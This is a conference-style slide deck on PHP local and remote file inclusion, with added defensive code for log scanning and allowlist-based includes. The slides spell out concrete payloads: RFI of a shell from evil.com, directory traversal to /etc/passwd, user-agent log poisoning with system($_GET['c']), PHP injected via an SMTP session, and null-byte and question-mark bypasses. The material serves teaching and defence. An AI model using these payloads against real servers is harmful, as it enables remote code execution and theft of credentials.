Tim Strijdhorst - Team THC - Inclusion Vulnerabilities
1
Speaker: Tim Strijdhorst
Group: TeamTHC
File Inclusion Vulnerabilities
Disclaimer
The author of this talk is not responsible for what you do with this information.
If you go out there and be a scriptkiddie, it's not only illegal, it's also pretty lame.
Introduction
This talk covers:
PHP
Apache
Linux
MySQL
It assumes a standard configuration (file locations can differ from server to server).
All the theory can be applied to all sorts of software.
So you are by no means safe just because you use Windows with ASP and IIS.
What is an inclusion vulnerability?
Based on user input
As with SQL injection, the developer is too trusting or too careless.
Code often includes/imports other pages
Because of the size of the code files and for proper design
Dynamic including is where it goes wrong
**YOU HAVE TO FILTER USER INPUT**
What is user input?
A lot of stuff, some you wouldn't expect:
GET data (URL variables)
POST data
Header data (user agent?)
Cookies (just client-side text files)
XMLHttpRequests (Ajax)
THE USER IS NOT TO BE TRUSTED
Definition of inclusion vulnerability
2 types of inclusion vulns:
Local File Inclusion (LFI)
Remote File Inclusion (RFI)
RFI is less common these days: it needs a PHP version older than 5.2 or a badly misconfigured php.ini. A lot of webhosts still use PHP 4 though.
One of the easiest ways to lose your server
Example code
index.php:
  <?php
  include($_GET['page']);
  ?>
test.html:
  <html>
  <head><title>Example</title></head>
  <body>This is an example of an included HTML page</body>
  </html>
Developer intended use: http://localhost/index.php?page=test.html
Outputs the content of test.html
What's the vulnerability here?
Vulnerability explained
Let's say the PHP version is 4.3
Vulnerable to both remote and local inclusion
Let's say our input is:
http://localhost/index.php?page=http://www.google.com
Code would be:
  <?php
  include("http://www.google.com");
  ?>
Which is completely valid PHP code (given the above circumstances)
Vulnerability explained
Let's say our input is: http://localhost/index.php?page=otherfile.txt
Code would be:
  <?php
  include("otherfile.txt");
  ?>
Still very valid PHP code, which outputs the content of otherfile.txt
Why is this so awesome?
Basic exploitation of RFI
PHP shell (the most popular one out there is c99shell)
Let's say it's stored at http://evil.com/shell.txt (the file contains the PHP code)
Let's say our input is:
http://localhost/index.php?page=http://evil.com/shell.txt
PHP will include shell.txt and execute my code
The server is ours
Basic exploitation of LFI
Almost every PHP app has a config file
Most likely the almighty config.php. This usually includes the database credentials.
Example:
  <?php
  $CONFIG['database']['hostname'] = 'localhost';
  $CONFIG['database']['username'] = 'root';
  $CONFIG['database']['password'] = 'secret';
  $CONFIG['database']['database'] = 'lolwut';
  ?>
In most applications: access to the database → administrator
Basic exploitation of LFI
This can also be used for:
Other functions (require, fopen, etc.)
Reading all non-PHP files (password files maybe?)
Reading code, if the script doesn't use include() but actually outputs the file (highlight_file(), for example)
Advanced LFI Tricks
Using directory traversal to read files
Injecting code into logs
Injecting code into session variables
Injecting code into environmental variables
Injecting code into other files
Injecting code into mail
Shared hosting
Basic UNIX background
Your current directory: /home/tim/
The name for the current directory is '.'
Like: './lol.sh' executes the lol.sh script inside /home/tim/
The name for the parent directory is '..'
Like: '../lol.sh' executes the lol.sh script inside /home/
But also: 'cat ../../etc/passwd' will work just fine
Using directory traversal
Website is located at: /var/www/public/index.php
It seems like we can only read stuff from /var/www/public/
Wrong, use the default UNIX parent-directory name '..'
For instance: http://localhost/index.php?page=../../../etc/passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/bin/sh
  ...
Injecting code into logs
Some information about Apache's access.log:
Example location: /var/log/apache2/access.log
It logs all GET requests
This includes the requested path and the user agent
A user agent is also user input, since it's a spoofable header
The webserver process can read the log if it's configured that way, and 99% of the time this is the case.
Example (trimmed):
"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Firefox/3.5.8"
Injecting code into logs
Use a user agent like:
<?system($_GET['c']);?>   // arbitrary command execution
The log entry then looks like this:
"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "<?system($_GET['c']);?>"
Example exploit:
http://localhost/index.php?page=../../log/apache2/access.log&c=cat /etc/passwd
Tadaa, another server is yours <(^_^<) <( ^_^ )> (>^_^)>
Injecting code into session variables
By default, sessions are stored in /tmp/sess_%{phpsessionid}
If you can inject information into a session variable, it will be saved in the session file
You can find the session ID in your cookies
Include this file and you will be able to inject code
  <?php
  session_start();
  $_SESSION['lol'] = $_POST['userinput'];
  ?>
Injecting code into environmental variables
Every process has a process entry in the /proc directory
/proc/self references the process directory of the accessing process
/proc/self/environ holds the environment variables of the process; in the case of Apache, this includes the user agent, which we can inject code into
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
...
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=300
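The user agent is the common thread of the log-poisoning and /proc/self/environ slides above: whatever the client sends ends up verbatim in access.log and in the Apache process environment. The following PHP script is an added example (not part of the talk) that takes the defender's side of that observation. It parses Apache combined-format log lines, flags PHP open tags or dangerous function calls in the user-agent, referer and request fields, and flags directory-traversal sequences in the request path, so an attempted log-poisoning LFI shows up in monitoring. The sample log lines are constructed for the example; the regexes and field names are this example's own choices.

```php
<?php
// Added example (not from the talk): detect log-poisoning and traversal
// attempts in Apache combined-format access.log lines.
declare(strict_types=1);

// Combined log format:
//   ip ident user [time] "request" status bytes "referer" "user-agent"
const LOG_LINE_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"/';

// PHP open tags (<? <?php <?=) and the calls a poisoned entry usually needs.
const PHP_CODE_RE = '/<\?(php|=)?|\b(system|passthru|shell_exec|exec|eval)\s*\(/i';

// '../' or '..\' in plain or URL-encoded form inside the request line.
const TRAVERSAL_RE = '/\.\.[\/\\\\]|%2e%2e/i';

/** Parse one line into named fields, or return null if it is not combined format. */
function parseLogLine(string $line): ?array
{
    if (!preg_match(LOG_LINE_RE, $line, $m)) {
        return null;
    }
    return [
        'ip'      => $m[1],
        'time'    => $m[2],
        'request' => $m[3],
        'status'  => (int) $m[4],
        'referer' => $m[6],
        'ua'      => $m[7],
    ];
}

/**
 * Scan a block of log text and return one finding per suspicious field:
 * ['line' => n, 'ip' => ..., 'field' => ..., 'reason' => ..., 'value' => ...].
 */
function findPoisonedEntries(string $log): array
{
    $findings = [];
    foreach (explode("\n", $log) as $i => $line) {
        $entry = parseLogLine($line);
        if ($entry === null) {
            continue;   // blank line or a format we do not understand
        }
        // Any client-controlled field carrying PHP code is a poisoning attempt.
        foreach (['ua', 'referer', 'request'] as $field) {
            if (preg_match(PHP_CODE_RE, $entry[$field])) {
                $findings[] = ['line' => $i + 1, 'ip' => $entry['ip'],
                               'field' => $field, 'reason' => 'php-code',
                               'value' => $entry[$field]];
            }
        }
        // Traversal in the request line is the other half of an LFI attempt.
        if (preg_match(TRAVERSAL_RE, $entry['request'])) {
            $findings[] = ['line' => $i + 1, 'ip' => $entry['ip'],
                           'field' => 'request', 'reason' => 'traversal',
                           'value' => $entry['request']];
        }
    }
    return $findings;
}

// Constructed sample: one normal request, one carrying the talk's user-agent
// payload, and one including the poisoned log via traversal with a tag in
// the referer as well. Addresses are documentation ranges, not real hosts.
$sample = <<<'LOG'
127.0.0.1 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Firefox/3.5.8"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "<?system($_GET['c']);?>"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=../../log/apache2/access.log&c=id HTTP/1.1" 200 512 "<?php phpinfo(); ?>" "curl/7.68.0"
LOG;

foreach (findPoisonedEntries($sample) as $f) {
    printf("line %d  %-12s %-8s %-10s %s\n",
        $f['line'], $f['ip'], $f['field'], $f['reason'], $f['value']);
}
// Expected: nothing for line 1; line 2 flagged on ua (php-code);
// line 3 flagged on referer (php-code) and on request (traversal).
```

Run it as `php scan.php`, or replace `$sample` with `file_get_contents('/var/log/apache2/access.log')` to scan a real log. The same scan over `strings /proc/<pid>/environ` output would catch a poisoned HTTP_USER_AGENT, since the tag pattern does not depend on the log format. Keep the PHP-tag rule narrow and the function-call rule broad; the open tag is what makes an entry executable when included, so it is the higher-confidence signal.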
Injecting code into other files
Some websites offer image uploads (avatars, photo galleries, etc.) which aren't checked properly (file extension, MIME type)
We can construct a valid .jpeg which contains PHP code in its metadata
This will pass any image validation check and get uploaded, hopefully to a predictable location
We can then include this file in our LFI attack to execute PHP code
There are many more ways to upload files: FTP, badly written upload pages, etc.
Every single one of them can be a way in
Injecting code into mail
There are three ways to abuse email:
First of all, we might send an e-mail to a user on the target server (i.e. [email protected]) and then attempt to include /var/spool/mail/tim. But this will only work on very badly configured, out-of-date servers.
The second method would be to include /var/log/maillog and then proceed to connect to port 25:
root@h4xb0x:/# telnet target.com 25
Connected to target.com.
220 hidden.domain.com ESMTP
HELO
250 hidden.domain.com
MAIL FROM: h4x0r < ?phpinfo();? >
250 ok
RCPT TO: [email protected]
250 ok
DATA
354 go ahead
Subject: pwnage.
250 ok 1186501618 qp 7063
quit
Injecting code into mail
The third method would be to send an e-mail to an existing user, assuming our target server runs a mail server, and attempt to include the mail file
We would put our PHP code in the e-mail and then proceed to include the file associated with it
The standard qmail format (for example) is: /var/qmail/mailnames/[targetdomain.com]/[targetuser]/Maildir/new/
The filename format will be: <UNIX Timestamp>.<PID>.server.domain.com
We could then proceed to bruteforce the timestamp, starting at an educated guess
We could attempt to determine the PID from information in /proc/self, or we could bruteforce it
This attack is quite hard and not likely to succeed; it should be considered a last resort, as it's bound to make a lot of 'noise' on the server
Shared Hosting
Multiple websites on 1 server (using VirtualHosts)
Most cheap webhosting is shared hosting
Free hosting is almost always shared hosting (and a good target)
Problem? If you are super secure but your IP neighbour is sloppy, you can have a serious problem.
Shared Hosting
You want to hack alice.com
You can't, it's super secure
You find bob.com, which is on the same server
Bob has an inclusion vulnerability. After pwning Bob we can have more or less two situations:
The server's rights are badly configured and we can access alice.com's files
The server's rights are properly configured, but we can execute a privilege-escalation attack (a local kernel exploit, for example)
alice.com is now yours too :)
Defending yourself
Filter user input
First strip away everything non-alphanumeric. Who uses non-alphanumeric chars in a filename anyway?
Example:
  $page = preg_replace("/[^a-z0-9.]+/i", "", $page);
Then force the .html filetype:
  <?php
  $page = $_GET['page'].'.html'; // forces the .html filetype
  include($page);
  ?>
Wrong again (we'll see why shortly)
Defending yourself
Properly configure your box, this includes:
PHP (php.ini or safe_mode)
Apache
Operating system (access modes?)
Proper rights management
Apply basedir restrictions!
If you configure the server properly, the damage can be contained even if someone manages to exploit you.
safe_mode will be gone in PHP 6 though, so you had better configure it right
Defeating the defense
Does this really force the .html filetype?
Nope, there are 2 ways to circumvent it:
Nullbyte injection
Questionmark injection
  <?php
  $page = $_GET['page'].'.html'; // forces the .html filetype
  include($page);
  ?>
Nullbyte injection
Nullbyte: the character that terminates a C string
Written as \0, or %00 in URL-encoded hex
http://localhost/index.php?page=config.php%00
$page == 'config.php%00.html'
The PHP parser doesn't care about nullbytes in strings
But the PHP interpreter itself is written in C, and that's another story
This works for a lot of other things too
  <?php
  $page = $_GET['page'].'.php'; // forces the .php filetype
  include($page);
  ?>
Questionmark Injection
This only works for remote inclusion
http://localhost/index.php?page=http://evil.com/shell.txt?
$page == 'http://evil.com/shell.txt?.php'
'?' starts the query string in a URL (index.php?page=)
So PHP treats '.php' as a query-string variable, not as part of the path
And loads http://evil.com/shell.txt
  <?php
  $page = $_GET['page'].'.php'; // forces the .php filetype
  include($page);
  ?>
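The "Defending yourself" slides propose stripping characters and appending a fixed extension, and the nullbyte and questionmark slides show why string surgery on the input is not enough. The PHP below is an added example (it is not the talk's code) of the defence that actually holds: decide which pages exist with an allowlist, resolve the chosen page with realpath(), and refuse anything whose canonical path does not sit under one directory. It also reports the two php.ini settings the configuration slide alludes to (allow_url_include and open_basedir). The directory name, the allowlist and the test inputs are constructed for this example; the inputs are the payloads from the preceding slides.

```php
<?php
// Added example (not from the talk): a hardened replacement for
//   include($_GET['page'] . '.html');
declare(strict_types=1);

// Assumption: the static pages a user may request live here.
const PAGE_DIR = __DIR__ . '/pages';
// Constructed allowlist of page names that actually exist on disk.
const ALLOWED_PAGES = ['test', 'about', 'contact'];

/**
 * Map a user-supplied page name to a safe absolute path, or return null.
 * Rejection happens before include() ever sees the string, so a nullbyte,
 * a URL or a '..' never reaches the C side of the interpreter.
 */
function resolvePage(string $page): ?string
{
    // 1. Syntactic gate: a plain token only. This rejects '/', '.', '?',
    //    ':' and the "\0" that config.php%00 decodes to.
    if (!preg_match('/^[a-z0-9_-]{1,32}$/i', $page)) {
        return null;
    }
    $name = strtolower($page);

    // 2. Semantic gate: only names we ship are accepted at all.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }

    // 3. Canonicalise and confine. realpath() returns false for a missing
    //    file, so an absent page is treated exactly like a forbidden one.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $name . '.html');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;   // resolved outside PAGE_DIR (symlink tricks etc.)
    }
    return $path;
}

/** Report php.ini settings that widen the blast radius of an inclusion bug. */
function riskyIncludeSettings(): array
{
    $warnings = [];
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $warnings[] = 'allow_url_include is On: include() accepts URLs (RFI)';
    }
    if (ini_get('open_basedir') === '' || ini_get('open_basedir') === false) {
        $warnings[] = 'open_basedir is unset: file access is not confined';
    }
    return $warnings;
}

// Constructed inputs: the intended page plus the payloads from the slides.
$inputs = [
    'test',
    '../../../etc/passwd',
    "config.php\0",                 // what config.php%00 becomes after decoding
    'http://evil.com/shell.txt?',
    '/proc/self/environ',
];

foreach ($inputs as $in) {
    $resolved = resolvePage($in);
    printf("%-30s -> %s\n", addcslashes($in, "\0"), $resolved ?? 'REJECTED');
}
foreach (riskyIncludeSettings() as $w) {
    echo "config warning: $w\n";
}

// In index.php the include then becomes:
//   $path = resolvePage($_GET['page'] ?? '');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Only 'test' resolves, and only if pages/test.html exists; every other input is rejected at step 1, so steps 2 and 3 are defence in depth against a future change to the regex. The allowlist is the real control: with it, the extension-append trick from the slides is never needed, and there is no concatenated string for a nullbyte or a '?' to cut short. The realpath() prefix check is what protects against the directory-traversal slide even if the allowlist is later replaced by a directory listing.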
The point to all this?
You can't trust your users
It could be your grandmother or a hacker, you just don't know.
References
http://en.wikipedia.org/wiki/Null_character#Security_exploit:_Poison_null_byte
http://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/
http://www.phpfreaks.com/tutorial/php-security
http://insecurity.nl/?strInsecurity_Component=article&intArticle_ID=2
http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/
http://avatar-dev.tsl.utwente.nl
Questions?